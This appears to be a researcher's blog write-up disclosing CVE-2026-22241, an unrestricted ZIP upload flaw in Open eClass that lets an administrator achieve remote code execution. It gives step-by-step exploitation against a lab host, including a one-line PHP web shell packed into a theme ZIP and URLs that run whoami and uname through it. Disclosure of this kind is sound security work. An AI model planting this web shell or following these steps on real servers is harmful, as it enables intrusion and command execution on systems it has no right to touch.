Hello Fri3nd,
Happy New Year 2026! Have a wonderful year ahead. I recently discovered my first CVE in Open eClass (prior to v4.2), a widely used open-source course management system. The flaw is assigned as CVE-2026-22241 with CVSS Score of 7.3 HIGH , that allows an administrative user to achieve Remote Code Execution (RCE) by uploading a malicious ZIP file into the web server.
Open eClass (formerly GUnet eClass) is a platform used by educational institutions to manage courses and digital classrooms.
Vulnerability Overview:#
The Entry Point: An admin can upload a
evil.ziparchive containing theme data.The Flaw: The application extracts the contents of the ZIP file into a publicly accessible directory
/courses/theme_data/without validating the file types inside the archive.The Exploit: By packing a simple PHP shell into the ZIP file, the server extracts it and RCE is achieved.
Exploitation Steps#
Version Details#
Web Server Version: Apache/2.4.58 (Ubuntu)
PHP version : 8.3.6
Database server version : 8.0.40-0ubuntu0.24.04.1
Version : Open eClass 4.0.1

Video Poc Explanation#
Automated Exploit#
CVE-2026-22241 Exploit for GUnet Open eClass Unrestricted File Upload Leads to Remote Code Execution (RCE)
Manual Exploitation Steps#
Step 1. Login as an Administrator#

Step 2. Navigate to the “Admin Tool” > “Theme Setting” form Administration Page.#

Now navigate to “Theme Settings”

Direct Url :
http://172.16.10.134/openeclass/modules/admin/theme_options.php
Import Option

Step 3. Creating the Malicious Zip.#
Create a malicious file contains evil.php
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
Create the archive.
zip poc.zip evil.php

Step 4. Upload the malicious zip in import option#

After uploading we will get successful upload message.

Step 5. Execute Remote Commands#
Now execute arbitrary commands using directly via a web browser
RCE Example executing whoami:
http://172.16.10.134/openeclass/courses/theme_data/evil.php?cmd=whoami

RCE Example executing uname -a:
http://172.16.10.134/openeclass/courses/theme_data/evil.php?cmd=uname%20-a

Acknowledgements#
- RoboGR00t for initial research on Open eClass GUnet.
- FreySolarEye for research on Open eClass GUnet.
- GUnet for their ongoing commitment to enhancing platform security.
References#
- GitHub Advisory: GHSA-rf6j-xgqp-wjxg
- CVE ORG : CVE-2026-22241
- NVD : CVE-2026-22241
